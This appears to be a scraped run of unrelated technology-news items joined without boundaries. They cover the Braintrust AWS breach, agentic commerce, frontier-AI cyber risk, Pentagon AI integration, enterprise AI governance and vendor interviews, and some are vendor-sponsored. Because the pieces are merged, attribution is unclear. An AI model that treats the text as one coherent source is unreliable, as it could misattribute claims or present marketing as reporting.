Braintrust warned customers to rotate API keys after hackers breached an AWS account, exposing secrets tied to cloud-based AI models.
AI observability startup Braintrust warned customers to rotate API keys after attackers gained unauthorized access to one of the company’s AWS accounts, potentially exposing secrets used to connect to cloud-based AI models.
The company said it discovered suspicious activity on May 4 and immediately locked down the affected account, restricted access to related systems, and rotated internal credentials. The firm launched an investigation into the security incident.
“We’ve identified a security incident that involved unauthorized access to one of our AWS accounts. We are actively investigating, and we have engaged incident response experts,” reads the security breach notice published by the company. “We have contained the incident by locking down the compromised account, auditing and restricting access across related systems, rotating internal secrets, and engaging incident response experts to support our investigation. As a precaution, we recommend that all customers rotate any org-level AI provider keys used with Braintrust.”
Braintrust notified customers the following day and shared indicators of compromise and remediation guidance.
Although Braintrust says the impact appears limited, experts warn the breach highlights growing AI supply chain risks, as AI platforms increasingly store valuable API credentials targeted by attackers.
The potential exposure could affect organizations relying on Braintrust to manage AI provider keys across services and applications.
Researchers note that once threat actors obtain valid API keys, they can abuse AI services while appearing as legitimate users, often bypassing traditional security controls.
“To date, we’ve confirmed the issue affected one customer. Three additional customers reported suspicious spikes in AI provider usage, and we’re investigating those alongside them,” continues the notice. “We have not identified broader customer exposure based on our investigation to date, but as a precaution we informed all org admins with stored AI provider secrets in Braintrust. The investigation is ongoing.”
The incident also reflects a broader trend of attackers targeting cloud accounts and SaaS providers to gain indirect access to downstream customers and interconnected AI infrastructure.
The company plans to add new safeguards, including timestamps and user attribution for API key changes, while the investigation into the incident remains ongoing.
After a series of mishaps, retailers are learning the hard way that agentic commerce is shaping up to be harder than expected.
When OpenAI launched Instant Checkout last fall, expectations were high. Walmart tested ChatGPT as a checkout channel for about 200,000 products, but found in-chat purchases converted 3X worse than on their own site. Daniel Danker, Walmart’s EVP of product and design, called the experience “unsatisfying” and confirmed Walmart was backing out.
OpenAI rolled back the feature, admitted in an article that “the initial version of Instant Checkout did not offer the level of flexibility that [we] aspire to provide,” and shifted toward retailer-controlled apps inside ChatGPT. The company handed checkout back to merchants and refocused on product discovery.
The lesson for retail CIOs is that agentic commerce doesn’t work without a solid data layer. Who is this shopper across every channel they have touched? What is in stock, where, and for how long? What is in their cart from three days ago on a different device? An agent that cannot answer those questions in real time is an expensive search bar with a checkout button attached.
The rise of agentic commerce and challenges ahead
Bain projects that the agentic commerce market could reach $300 to $500 billion by 2030 in the U.S. alone, making up roughly 15% to 25% of overall e-commerce. This means a growing share of those journeys will include at least one step where an AI agent acts on the customer’s behalf.
The issue is that most retail systems were not built for how customers actually shop. They were built for how retailers wish customers shopped.
Most retail tech assumes a clean shopping session: arrive, browse, add to cart, check out, leave. Analytics and recommendation engines all operate based on that model. When agentic AI systems inherit the same assumption, they break under it, because the customer is the ongoing thread, not the session.
Shoppers start researching on a phone during a commute, add to a cart on a laptop that evening, compare prices on a marketplace the next morning, ask an AI assistant at lunch, and buy in-store the following weekend. That is one journey, not five. Retailers who treat each touchpoint as a fresh session will watch their agents surface recommendations that ignore the cart, promotions that clash with loyalty status, and answers that contradict what the customer was told yesterday.
What fragmented data looks like in an AI experience
When the customer journey is disconnected, and the data behind it is fragmented, the cracks show up in the places customers see them first.
An agent recommends an item that the customer returned last month. A bundle ships in two pieces from two fulfillment nodes because inventory visibility is siloed. A promotional offer applies to a product already in the customer’s cart on another device. An agent commits to a delivery window that the supply chain cannot honor.
Each is a data problem dressed up as an AI problem, and each chips away at the trust that makes the agent useful.
A 2025 Gartner survey of technology leaders found that half report their organizations lack the technical and data stack readiness required for AI agent deployment. That gap does not close by adding another model. It closes when customer, product, inventory, and fulfillment data are unified into a single, trusted view that the agent can draw from.
Figure 1: Fragmented and siloed data stymies AI initiatives (source: Reltio)
Context is the new competitive moat
If fragmented data is the problem, unified context is the advantage. Every retailer in the next wave of agentic commerce will have access to roughly the same foundation models and protocols. OpenAI’s ACP, Google’s Universal Commerce Protocol, and whatever comes next will be broadly available. The model is the commodity layer.
What will not commoditize is the quality of a retailer’s context. Customer identity that persists across channels and devices. Product data that is accurate, enriched, and synchronized in real time. Inventory that reflects what is actually available right now, not what was available when the overnight batch ran. Order history, return history, loyalty status, and preference signals that make a recommendation feel considered rather than generic. That connective tissue turns a generic agent into a brand-differentiated experience.
The retailers who figure this out first will be those who have successfully built the data foundation that lets the model do its job.
What this means for the CIO agenda
For technology leaders in retail, the implications are concrete:
Identity resolution stops being a back-office project. If an agent cannot recognize the same customer across web, app, store, loyalty program, and third-party surfaces like ChatGPT or Gemini, it cannot personalize anything meaningful. Cross-channel identity becomes a customer-facing capability.
Real-time product and inventory synchronization becomes table stakes. Batch updates were tolerable when humans did the browsing. Agents act on whatever the data says at the moment of the query, and stale data shows up as broken promises.
Data unification moves from efficiency play to experience layer. Successfully consolidating customer, product, and operational data decides whether AI experiences feel coherent or fragmented to the customer.
AI investment exposes existing data debt. Every AI investment amplifies the consequences of whatever data gaps already exist. The more you invest in the model layer, the more exposed the data layer becomes.
The data layer is the AI strategy
The retailers who win in agentic commerce will be the ones whose agents can act on a complete, trusted, real-time picture of the customer and the business, every time. AI is only as good as the data context that informs it.
At Reltio, we call this “context intelligence”: the ability to connect customer, product, and operational data into a unified, real-time foundation that supports better decisions and better experiences across every channel, every touchpoint, and every agent.
The checkout button was never the hard part. The context behind it is where the next decade of retail will be won.
The evolution of frontier AI is reshaping how organizations approach cyber risk. As these highly capable AI models rapidly discover vulnerabilities and develop exploits for them, they are forcing a shift in how businesses evaluate, prioritize, and address areas of exposure.
Frontier AI describes a new class of advanced AI systems that can analyze software, identify vulnerabilities, accelerate exploit development, and support sophisticated security workflows. Anthropic’s Claude Mythos and OpenAI’s GPT-5.4-Cyber are early examples of how AI is expanding offensive and defensive capabilities.
As vulnerabilities can be discovered and exploited at faster speeds, organizations must rethink their approach to cyber risk. For years, security teams operated under an assumption of delays on the adversary’s side. Discovering a vulnerability, turning it into a usable exploit, chaining it into a broader attack, and using it against a target took time and skill. This process created a window, however imperfect, for patching and mitigation.
Now, frontier AI models can lower the skill barrier for attackers and compress the time between exposure and exploitation faster than defenders can patch. As they do, traditional vulnerability management is becoming less effective. There is no longer time for periodic assessments and prioritizing patches based on severity scores. Organizations must gain a consistent view of where they are exposed, which exposures can be exploited, and which exploitations can have the greatest business impact.
The shift from vulnerability management to exposure management comes with new questions: Is the vulnerable asset reachable? Is there a viable attack path? Can the issue be chained with another weakness to achieve privilege escalation or lateral movement? Is there evidence of adversaries targeting this in the wild? Risk must be measured in terms of observed activity and environment-specific conditions — not theoretical severity alone. If not, defenders will face a growing mountain of vulnerabilities to patch while attackers target the few exposures they need.
Below are five steps organizations must take to prepare as the window between discovery and exploitation closes:
Measure exploitability: As AI accelerates the rate of discovery, the challenge will be determining which exposures present the greatest risk and which to address first. A mature security program ranks exposures according to operational risk. By combining asset criticality, reachability, identity pathways, attacker techniques, and signs of exploitation, organizations can better understand which issues to fix. Threat intelligence is critical in this process as it shows which vulnerabilities align with attacker behavior.
Continuously validate exposure from the “inside out” and “outside in”: Organizations require a point-in-time view of their exposure. Validation should both confirm the exposure is real and determine whether existing controls, detections, and response processes will be effective against potential attack paths. This requires integrating internal telemetry, configuration state, identity relationships, network reachability, and workload behavior into a unified model of exposure. Continuous validation also requires testing existing controls. A setup that looks strong on paper may fail in practice, or privileged access may be broader than believed.
Design for identity control: It can be assumed that some exposures will remain unresolved for a period of time. The defender’s goal should be to make exploitation harder, reduce the chance of meaningful access, and contain adversaries before they can move laterally or escalate privileges. Identity is core to this. Successful attacks often become dangerous when they allow an adversary to become a trusted identity in a target environment. Prevention and containment require commitment to principles of strong identity security: zero standing privileges, continuously verifying access, limiting credential exposure, and connecting identity posture to endpoint and workload context in real time.
Detect and respond at machine speed: As discovery accelerates, response must keep pace. This does not mean removing humans from the process, but maximizing the use of machines for the work where they are more efficient. The system must be able to quickly gather context, correlate signals, and initiate appropriate actions. Detection must span activity across endpoints, identities, and cloud environments. Investigation must reconstruct attack chains quickly enough to support decisive action.
Apply AI with control and intent: Organizations need AI to scale analysis, prioritization, and response. AI should be embedded into workflows where it augments human decision-making while aligning with governance and policy controls. But while adopting AI is part of the solution, it introduces new forms of risk. Organizations need visibility into shadow AI tools and agents, as unmanaged AI adoption can expand the attack surface. They must also secure the AI stack by monitoring how models are used, governing the systems AI agents can access, restricting unauthorized access, validating outputs, and designing controls around prompt injection, model misuse, and sensitive data leaks.
Frontier AI is changing more than the speed of cyberattacks. It’s lowering the amount of time organizations have to identify, assess, and reduce risk before an exposure becomes a breach. The organizations best positioned for this shift will be those that treat exposure reduction, identity control, and machine-speed response as business priorities.
This Threat Analysis report is part of the “Purple Team Series” in which the LevelBlue Global Security Operations Center (GSOC) provides a technical overview of some of the methods that threat actors are using to compromise their victims.
AWS Rex adds runtime guardrails for agentic AI, but security leaders still need data-layer controls to satisfy compliance and audit demands.
The post AWS Rex Is a Big Step for Agentic AI Security, But Not the Final Layer appeared first on TechRepublic.
The Pentagon is integrating AI into military operations, transforming cybersecurity, targeting, and command systems into a unified warfare architecture.
May 2026 marks a turning point in the evolution of modern warfare: the convergence of artificial intelligence, cybersecurity, and conventional military power is no longer theoretical. It is becoming an operational reality.
The Pentagon has signed agreements with major technology companies, including OpenAI, Google, Microsoft, Amazon, and SpaceX to integrate advanced AI models into classified military networks. The stated goal is clear: transform the United States into an “AI-first” military force capable of maintaining decision superiority across every battlefield domain.
Under this strategy, AI is no longer treated as a laboratory tool or analytical assistant. It is moving directly into the military chain of command, intelligence analysis, logistics, targeting, and operational planning. More than 1.3 million Department of Defense employees are already using the GenAI.mil platform, dramatically shortening processes that once took months to just days.
The Pentagon’s doctrine reflects a major cultural shift: code and combat are no longer separate domains. Cybersecurity itself is now considered a combat capability. The ability to deploy, secure, update, and operate AI models inside classified environments has become part of national defense infrastructure.
The contracts signed with technology providers include “lawful operational use” clauses, requiring vendors to accept any use considered legitimate by the Pentagon, including autonomous weapons systems and intelligence operations. This raises profound ethical and geopolitical questions.
At the same time, the U.S. military is pushing for deep integration across defense systems. Through the Army’s new “Right to Integrate” initiative, manufacturers of missiles, drones, radars, and sensors are being asked to open their software interfaces so AI agents can connect systems in real time. The inspiration comes largely from Ukraine, where open APIs allowed rapid battlefield integration between drones, sensors, and fire-control systems.
However, this transformation creates a dangerous paradox: the same openness that enables speed and flexibility also expands the attack surface. Every API, cloud platform, and AI integration point can potentially become an entry point for sophisticated adversaries such as China, Russia, or state-sponsored APT groups.
A compromised AI-enabled military ecosystem could allow attackers to inject false sensor data, manipulate targeting systems, degrade drone communications, study operational decision patterns, or even hijack autonomous weapons platforms. In this context, software vulnerabilities and supply-chain weaknesses are no longer merely IT problems; they become military objectives.
Washington is also increasingly concerned about the cyber risks posed by advanced AI models themselves. According to reports, the White House is considering new oversight mechanisms for frontier AI systems capable of autonomously discovering software vulnerabilities or automating cyberattacks at scale. Officials fear that uncontrolled deployment of such models could lead to mass exploitation of critical infrastructure, financial systems, or global supply chains.
The strategic implications extend beyond military technology. Major cloud providers such as Amazon, Microsoft, and Google are gradually becoming part of the American defense architecture. Civilian digital infrastructure is evolving into a structural extension of military power.
This raises difficult questions for Europe and Italy. In a world where most cloud, AI, and cybersecurity infrastructures are controlled by American companies, what does technological sovereignty really mean? Sovereignty is no longer just about producing chips or funding startups. It is about controlling the digital infrastructure that supports national defense, determining who can update AI systems operating on classified networks, and deciding who sets the operational rules of software during crises.
The United States, Israel, and China are already integrating AI into military doctrine at high speed. Europe risks remaining trapped between regulation and technological dependence unless it develops its own industrial capabilities, operational autonomy, and independent evaluation frameworks.
The message coming from Washington is unmistakable: the future of strategic power will depend on who controls AI models, data, interfaces, and software-driven operational systems. In modern warfare, software has become a battlefield domain, and the speed of code deployment increasingly matters as much as firepower itself.
A more detailed analysis is available in Italian here.
Every CIO I know has had some version of this conversation: their CEO comes back from a golf trip with their buddy, or a conference with peers, and is told AI is about to automate everything at their company, from HR to marketing and finance. No humans in the loop, just AI. The CEO then calls an all-hands Monday morning, and the CIO is suddenly on the hook to make it all happen.
The instinct for CEOs to chase unsubstantiated claims is understandable since they’re responding to competitive pressure. But that leaves CIOs responsible to close the gap between ambition and reality. Making AI work in an organization with decades of accumulated process, permission frameworks, and cultural inertia is very different from deploying it in a demo.
The best response isn’t to push back on the ambition, but to redirect it. Translate the CEO’s vision into an honest map of what has to happen for the organization to get there, including the infrastructure, governance, and training. That helps to convert the kneejerk compulsion to move faster into a concrete plan that leadership can get behind.
Here’s what CIOs should actually be focused on to get where their CEOs want them to go, regardless of what’s discussed on the links.
1. Start where AI can build its own credibility
The hype machine wants you to climb Everest on day one. Instead, identify the repetitive tasks where AI can prove itself on familiar ground — the workflows your team already knows well, where results are easy to verify and the bar for trust is attainable.
The goal is the Eureka moment when a skeptic on your team sees a real result and becomes a believer. Those moments compound. When someone has seen AI make their work easier in a context they understand, they’re more likely to help you move things forward. You can’t force that change, but you can engineer the conditions for it.
2. Models will commoditize. Context will not.
Every few months, a new model claims to be smarter, faster, and cheaper than the last one. Don’t be distracted by that race. The lasting advantage in enterprise AI doesn’t just come from which model you’re running, it’s in the quality, governance, and semantic clarity of the data feeding it. Enterprises that invest in consistent business definitions, well-structured data, and clear lineage will outperform those that don’t, regardless of which model is in fashion. Context is your competitive moat. Focus on building that.
3. Nail down the permissions
In a world of dashboards, you know exactly what data will appear on a given page, so you can set permissions in advance for who can access it. In an AI world, the system can generate outputs that were never pre-designed. So how do you determine who has the right to see a result that was never anticipated?
Before deploying any agent that acts on someone’s behalf, such as filing a request, surfacing payroll data, or populating a record, first determine whether your existing permissions and access control frameworks can handle outputs that were never planned for. Most can’t. This is a prerequisite of what your CEO is asking for: the unglamorous infrastructure work that determines whether your AI is trustworthy in production. It needs to happen before you scale, not after.
4. Build an editing culture, not a writing one
For decades, engineers, analysts, and operations teams have been trained to write code, build reports, and define new processes. AI upends that. The skill now is editing — auditing what the system produces, catching what it got wrong, and knowing where to push back.
The truth is most people aren’t naturally good at editing because they’ve never had to be. That’s a skills gap that needs to be closed early on. Invest in helping engineers, analysts, and managers develop the judgment to evaluate AI outputs, not just generate them. Editing must become a core enterprise competency.
5. Measure behavior change, not tool adoption
Login data is a vanity metric. If your engineers are accessing AI coding tools but aren’t changing how they build, you haven’t adopted anything. The metric that makes more sense is productivity output. In agile terms, a team that completes 20 story points per sprint should hit about 28 with AI, not because the tools are magic, but because the repetitive work gets faster. If you’re not seeing that, you’re measuring the wrong thing. Pay attention to output, not usage metrics.
6. Reframe your organization’s relationship with failure
The instinct to de-risk everything made sense when software deployments were expensive and slow to reverse. AI works differently. The outputs are probabilistic, the iteration cycles are fast, and being overly cautious can cost valuable time. CIOs need to give teams permission to experiment in ways that feel uncomfortable by traditional enterprise standards, all while building the feedback loops that make fast failure safe. That culture shift has to be modeled from the top.
FOMO isn’t going away
CEOs will keep getting pulled into cycles of urgency and FOMO, and that pressure will keep landing on CIOs. The organizations that make real progress will be the ones that redirect that energy into infrastructure that makes AI trustworthy, measurement systems that show what’s working, and cultural changes that make adoption stick. That’s the agenda that’ll move your organization forward.
I have seen this movie before.
A decade ago, at Tesla, our Finance team faced a data crisis. We had information scattered across accounting, supply chain and delivery systems, all disconnected, all using different structures. The engineering team was rightfully focused on Full Self-Driving (FSD) and manufacturing. So, we did what productivity-hungry teams always do: We built our own solution. We taught ourselves Structured Query Language (SQL), normalized the data with creative IF-THEN logic and created our own reporting database.
It worked beautifully. Until it became a governance nightmare. The VP of Engineering hated our siloed system with embedded business logic. We eventually handed it over to IT, but not before our workaround forced the company to finally resource a proper data team.
The pattern is always the same: Productivity-hungry teams build workarounds faster than the organization can govern them, and by the time leadership notices, the workarounds have become the infrastructure.
That was more than a decade ago. The pattern took years to unfold.
Today, I am watching the exact same dynamic play out in insurance and industries across the board, but compressed into months, not years. AI adoption is sprawling across organizations, led by the same productivity-hungry individuals, but without central platforms or governance. Leadership has not created space for safe experimentation, so adoption spreads like a city without a highway system. The difference? Back then, we were building SQL databases. In 2026, we are building AI agents. And the cost of fragmentation is exponentially higher.
What is AI sprawl?
AI Sprawl is what happens when the cost of building AI drops faster than an organization can govern it. Teams spin up models, agents and automations independently. Each one works in isolation. None of them connect. The result is fragmented data, drifting decisions and intelligent systems that quietly get abandoned.
It happens because execution has become cheap. Large Language Model (LLM) APIs, no-code tools and cloud infrastructure have made spinning up AI trivially easy. A claims team builds an automation to speed adjudication. Underwriting builds a model to assess risk. Customer service deploys a chatbot. Each initiative delivers local value. No single project looks like a problem.
But collectively, they create an ungovernable landscape.
Over the past 18 months, the GenAI acceleration intensified what IDC calls the GenAI scramble: scattered, fragmented and sometimes redundant applications launched by business-led initiatives without central oversight. Many organizations have fallen into what researchers describe as a productivity trap: Focusing on short-sighted value generation instead of scalability, which limits their ability to create reusable capabilities across departments.
AI sprawl is everywhere
A major property and casualty carrier recently invited us to speak with their innovation leadership about implementing process automation. We spoke with more than 10 key stakeholders across multiple lines of business and found more than a dozen different POCs and local solutions across claims intake, underwriting and fraud detection.
Six of them were solving overlapping problems. None shared data infrastructure. Two had been abandoned months earlier but were still running and still being billed.
This is not an outlier. It is the norm.
AI Sprawl persists because it is insidious, hiding in plain sight unless you look for it. Business units move fast, build independently and solve immediate problems. IT discovers shadow AI only when something breaks, when an audit is triggered or when a vendor renewal surfaces a tool nobody knew existed. And the symptom multiplies as the number of innovative teams within the organization grows.
The 4 hidden costs of sprawl
AI Sprawl creates costs that compound over time, many of which are not visible in any single budget line. It results in a dangerous cascade of failures:
Governance becomes impossible. Companies cannot govern what they cannot see. When AI systems scatter across departments, audit trails fragment. Bias monitoring becomes inconsistent. Explainability standards vary by team.
Scaling stalls. Disconnected systems cannot integrate. Every new initiative starts from scratch instead of building on shared infrastructure.
Maintenance and redundant spending multiply. Teams that built AI to accelerate their work end up spending most of their time maintaining it. One carrier reported that 60% of their AI engineering capacity was devoted to maintaining existing tools rather than building new capabilities. Meanwhile, teams unknowingly pay for overlapping capabilities because nobody has a complete view of AI spending.
Talent drains away. The best AI engineers want to solve hard problems. When they are cornered into spending their time maintaining fragmented infrastructure, they walk out the door.
Why traditional governance fails
Seventy percent of large insurers are investing in AI governance frameworks. Yet only 5% have mature frameworks in place. This gap is not about commitment or resources. It is about a category mistake.
For the last two decades, enterprise software governance worked because the software itself worked a certain way. Systems were point solutions. A claims platform did claims. A policy admin system did policy admin. Each tool had a clear owner, a defined scope and a predictable boundary. Governance could wrap around the edges, through access controls, audit logs, change management, vendor reviews, because the edges were visible. We governed the perimeter because the perimeter was the product.
AI is not a point solution. It is foundational technology, closer to electricity or a database than to a piece of software. It does not sit inside a defined boundary; it flows across every process, every decision and every department that touches data. And because it flows, it cannot be governed at the perimeter.
This is why carriers applying the old playbook keep running in place. Policy documents, oversight committees and compliance checklists were designed to govern systems that stood still. AI does not stand still. It is built, modified, retrained and extended by the same teams it is meant to serve, often in the same week. By the time a governance committee reviews it, three more versions exist somewhere else in the organization.
The failure is not that carriers are governing AI badly. It is that they are governing it as if it were software, when it’s actually infrastructure. Infrastructure requires a different discipline: Shared foundations, common standards and the assumption that everyone will build on top of it. You do not govern electricity by reviewing each appliance. You govern it by standardizing the grid.
Until carriers make that shift, their frameworks will keep maturing on paper while sprawl compounds underneath.
3 questions every insurance CIO should be able to answer
If the failure of traditional governance is a category mistake, the first job of leadership is to check which category they are actually operating in. These three questions are not meant to produce tidy answers. They are meant to reveal whether you are still governing AI as software when you should be governing it as infrastructure.
1. Are you governing AI at the perimeter, or at the foundation?
Look at your current AI governance artifacts, such as the policies, the committees, the review processes. Are they designed to wrap around individual tools after they are built, or to set shared standards that every tool must be built on top of? Perimeter governance asks, “is this specific model compliant?” Foundational governance asks, “does every model in this organization inherit the same definitions, the same lineage and the same guardrails by default?” If your governance only kicks in at review time, you’re still treating AI like software. You’re already behind.
2. If you standardized one thing across your entire organization tomorrow, what would create the most leverage and why haven’t you?
Every carrier has a list of things they know should be standardized but have not been. Shared definitions for core entities. Common ways of handling unstructured inputs. A single source of truth for how decisions get logged. The question is not which item belongs at the top of the list; most CIOs already know. The question is what has been blocking the standardization: Is it political, budgetary, or organizational? Because that blocker, whatever it is, is also what is letting sprawl compound. Governance frameworks cannot fix foundational decisions that have been deferred.
3. When a new AI initiative launches next quarter, what will it automatically inherit from what already exists?
This is the real test. In a point-solution world, every new system is built fresh and governance is applied afterward. In a foundational world, every new system inherits shared standards, shared definitions, shared oversight before a single line of code is written. If the honest answer is “it will inherit nothing, and we will govern it after the fact,” then you do not have an AI governance problem. You have an AI foundation problem, and no amount of policy will close the gap.
The uncomfortable truth is that most carriers will answer these questions honestly and discover they are still operating from the old playbook. It is a signal that the work to be done is not more governance, but different governance, the kind that assumes AI is the ground floor, not the top floor.
This article is published as part of the Foundry Expert Contributor Network.
OpenAI and Anthropic are expanding into professional services through joint ventures and acquisition talks, moving closer to the implementation role traditionally held by systems integrators.
According to a Reuters report on the 5th, joint ventures linked to the two AI companies have been discussing acquisitions of service firms that help enterprises adopt AI, and OpenAI's side is reported to have made significant progress in three of those negotiations.
There is also a move to expand engineering and consulting headcount as enterprise customers shift generative AI from experimentation into production environments.
Meanwhile, Anthropic announced plans to establish a new enterprise AI services company backed by investment from Blackstone, Hellman & Friedman, and Goldman Sachs. The company aims to help mid-sized enterprises apply 'Claude' to core business operations.
Anthropic said its applied AI engineers will work with the new company's engineering team to identify use cases, build custom systems, and provide long-term customer support.
Behind the services push: the race for enterprise AI leadership intensifies
For CIOs, the key question in this shift is whether AI vendors are gradually replacing the roles traditionally held by consulting firms, systems integrators (SIs), and managed service providers. The trend shows the model companies' intent to take greater control over enterprise AI implementation. At the same time, it also reveals that SI firms still play an important role in large-scale build projects.
The move reflects a problem many CIOs already face. AI pilots can start quickly, but turning them into secure, stable operational systems takes months of integration and process work.
Faisal Kawoosa, founder and chief analyst at consulting firm Techarc, said, "Enterprise IT deployments have traditionally been consulting- or advisory-led," adding, "To speed up adoption that generates real revenue, they have to fit into existing enterprise frameworks and go-to-market models."
Kawoosa went on to say, "AI companies currently sit at the top of the value chain, and they want to stay 'in the driver's seat' rather than be reduced to mere IT suppliers."
Deepika Giri, head of research for AI, data analytics and data at IDC Asia/Pacific, said, "This shift could lead to a structural reshaping of enterprise AI as a whole," adding, "AI model companies are moving beyond being platform providers to actively designing the entire AI value chain." She added, "By extending into implementation, consulting, and managed services, the strategy is to go beyond supplying technology and engage more closely with enterprises' actual outcomes."
Kawoosa pointed to technological uncertainty and the possibility of a diminished role as reasons some IT services firms are cautious about AI adoption. "Amid the shift in go-to-market strategies, AI companies are taking the lead," he said.
Lower deployment risk, but deeper lock-in concerns
Adopting services directly from an AI model company can make initial deployment considerably easier.
Tulika Sheel, senior vice president at Kadence International, said, "Enterprises can get tighter integration and expert support, which can reduce deployment risk in the short term."
However, some point out that this convenience can turn into a long-term burden.
Sheel said, "Dependence can deepen across the entire stack, from models to data pipelines and workflows," adding, "Over time lock-in strengthens, and it can become hard to switch vendors without major disruption."
Neil Shah, vice president and partner at Counterpoint Research, said, "AI model companies are strengthening the coupling between usage-based business models and their applications and services, seeking to position themselves as 'one-stop' providers for enterprise customers."
He went on, "Controlling the application and services layer directly not only ties enterprises into their ecosystem but also lets them understand customers' needs, problems, and ways of working first-hand, which can be used for model optimization."
IDC's Giri assessed that lock-in is not inevitable, but stressed that avoiding it requires strategic design at an early stage.
Giri said, "With a modular architecture the model layer can gradually be abstracted away, but avoiding lock-in requires deliberate design choices," adding, "Otherwise there is a risk of becoming dependent not just on a particular model but on the whole stack, including data pipelines, workflows, and governance frameworks."
The trend also shows that enterprise AI still requires a great deal of implementation work.
Sheel noted, "Generative AI platforms are powerful, but supporting real business processes requires deep integration with internal data, workflows, and governance systems," adding, "This means there is a gap between model performance and real-world application."
The shift suggests that CIOs must look beyond which AI model performs better and also consider who will lead implementation and operations once that model is applied to enterprise systems.
Microsoft (MS) and Google are strengthening AI agent controls so that enterprise IT organizations can handle tools that access corporate data and perform tasks across a range of business applications.
MS officially launched 'Agent 365' for enterprise customers on May 1. The service helps organizations discover, manage, and secure AI agents. Notably, it covers agents running not only in MS environments but also in third-party SaaS, cloud, and on-premises environments.
Google announced an AI control center for 'Workspace' on the 4th. The feature is focused on providing a central, consolidated view of AI usage, security settings, data protection policies, and privacy safeguards.
The timing of these announcements reflects a change in how enterprises use AI. Many companies are no longer stuck at the chatbot-testing stage and are moving in earnest to adopt agents that access enterprise systems and perform work on behalf of users.
This change also affects how CIOs and CISOs view AI agents within the enterprise.
Biswajeet Mahapatra, principal analyst at research firm Forrester, said, "By placing agent controls alongside identity, access, data, and workload management, vendors are positioning AI governance as an operational domain jointly owned by IT and security organizations," adding, "From a CIO's perspective, AI agents need to be managed like any other digital workforce, with lifecycle management, cost visibility, and integration with service management frameworks."
The CISO's role is also expanding. Beyond the existing focus on model risk and data-leak response, a framework is required that can continuously control the behavior of increasingly autonomous agents and minimize the impact when risks materialize.
Lian Jye Su, chief analyst at Omdia, said, "AI governance is emerging as a core component of every AI-based enterprise application," stressing, "As deployments expand from pilots to enterprise-wide rollouts, governance must be built in from the AI build stage."
How MS and Google differ
MS's 'Agent 365' and Google's AI control center address similar governance problems, but their starting points differ.
Omdia's Su said, "Given that enterprises are adopting AI ever more actively in multicloud and hybrid IT environments, the two approaches are complementary," adding, "Each is optimized for AI workloads in its own environment, so enterprises heavily invested in a particular vendor will find the native AI governance experience much smoother."
Forrester's Mahapatra interpreted the difference as a matter of 'platform scope' rather than governance maturity. MS views AI agents as 'enterprise actors' to be managed across the organization, while Google tends to focus more on how AI operates within collaboration data and user content, he said.
Mahapatra said, "The two approaches address different control domains, so it is hard to call them purely competitive," but added, "Unless an enterprise standardizes on both ecosystems at once, it is also hard to call them fully complementary." He continued, "Over time, as each model becomes more tightly coupled with its own productivity and data platform, there is a growing risk that AI governance decisions become tied to a specific vendor choice rather than to enterprise architecture strategy."
Pareekh Jain, CEO of Pareekh Consulting, offered a more neutral view. "The two approaches are both complementary and competitive," Jain said, adding, "For enterprises that use both MS and Google in particular, AI governance is likely to become even more closely tied to each vendor's underlying platform."
Remaining risks
The new controls help enterprises better understand their AI agents, but analysts say they do not resolve larger risks such as shadow AI, third-party integrations, and accountability for autonomous actions.
Pareekh Jain, CEO of Pareekh Consulting, pointed out that shadow AI agents can still emerge through development tools, browser extensions, local assistants, SaaS copilots, and unauthorized tool integrations. He added that third-party integrations may also spread quickly, outpacing security vetting.
"Audit logs show what happened, but they cannot always explain why an autonomous agent chose to act that way," Jain said.
As a result, when an agent takes an action that creates business or security risk, enterprises face hard questions about control and accountability. Better logs do not automatically solve the problems of responsibility or control.
Forrester principal analyst Biswajeet Mahapatra pointed out that the biggest gaps are likely to occur outside the native platforms. Shadow agents created through low-code tools, external APIs, and SaaS applications can bypass central controls and operate with excessive or inherited permissions, he explained.
Mahapatra said, "Third-party integrations extend an agent's reach, but visibility into the subsequent actions and data propagation is often not secured to the same degree," adding, "When agents chain across multiple systems, auditability is also uneven, making it hard to distinguish intent from outcome, and accountability remains unclear when an autonomous agent causes a real business or security impact."
In the end, experts broadly agree that the baseline controls MS and Google provide are helpful but unlikely to fully cover the entire AI agent landscape. Enterprises that combine multicloud, multiple SaaS products, development platforms, and browser-based AI assistants need to establish a governance framework that goes beyond a single vendor console, they say.
As organizations continue to invest heavily in AI, many CIOs are still working to understand how those investments translate into measurable business impact. At the center of that challenge is a shift in how AI is approached, from isolated experimentation to enterprise-wide execution. In this conversation, Jeff Baker, Technology Managed Services Lead at PwC, shares how organizations can move beyond early-stage use cases and begin realizing meaningful outcomes.
Jeff Baker, Technology Managed Services Lead at PwC
CIO.com: Many CIOs are investing in AI but haven’t necessarily seen a return on that investment yet. What does it take to move from investment to actual innovation?
Jeff Baker: A couple of things. I don’t think a lot of our clients are thinking big enough about the impact of AI and some of the possibilities that are out there. One of the things we’re encouraging them to do is move it out of that experimental phase or the back office or cottage industry and really start teaming up with the business directly to find more impactful ways to use the technology that have a business outcome, not just a cool technology showcase.
There are a lot of skunkworks projects out there that look fun but aren’t necessarily hitting the bottom line from an impact standpoint. The more we can team the AI engineers with people inside the business who are asking for the technology, the more you’re going to see meaningful outcomes.
CIO.com: You’ve said that AI requires structural change, not just experimentation. What’s the most important operational shift CIOs should make?
Jeff Baker: I think about AI in two basic categories. There’s what I call citizen-led AI. We’re getting a lot of really cool tools into the hands of people at firms, and they’re doing interesting things with it. They’re organizing their inboxes and creating chat programs that respond to RFPs, and other “day in the life” tasks.
On the other side, there are more durable, agentic-type models that have a lot more business impact but require more investment. That’s where strong teaming between IT and the business is important to define what the outcome should be.
There’s also a lot of sophistication that comes with that. Is it durable? Is it secure? Are you thinking about bias? How are you curating it? Who owns the ongoing management and observability of those agents once they’re deployed?
Security and data management become critical. The agents are only as good as the data they’re based on. In many cases, companies need to clean up their data before these agents can be effective. And finally, this should be collaborative. These agents are not isolated. They’re going to work across the organization with other humans and other agents to help drive outcomes.
CIO.com: You’ve said AI-driven managed services differ from traditional models. How so, and where do CIOs get it wrong?
Jeff Baker: The difference for us, what we call Managed Services 2.0, is that it’s AI-first. It’s focused on business outcomes.
It’s not just about deploying a team to work tickets and hit service levels. It’s about improving business outcomes over time. We’re seeing efficiency gains of about 20% in the first year and up to 50% over five years with clients who allow us to use AI appropriately.
Where it can get tricky is in how these services are purchased. In an RFP process, procurement teams often try to normalize key elements across vendors. But that can flatten the innovation that providers are trying to bring to the table.
CIO.com: Looking ahead 3 to 5 years, what will separate organizations that succeed with AI from those that remain stuck in pilot mode?
Jeff Baker: It comes down to focusing on the business outcomes. What are you trying to achieve with technology, people, and your organization?
And then, in some ways, you have to get out of the way of the agents. They think differently than humans do. I see too many companies trying to treat agentic systems like a traditional business process automation exercise.
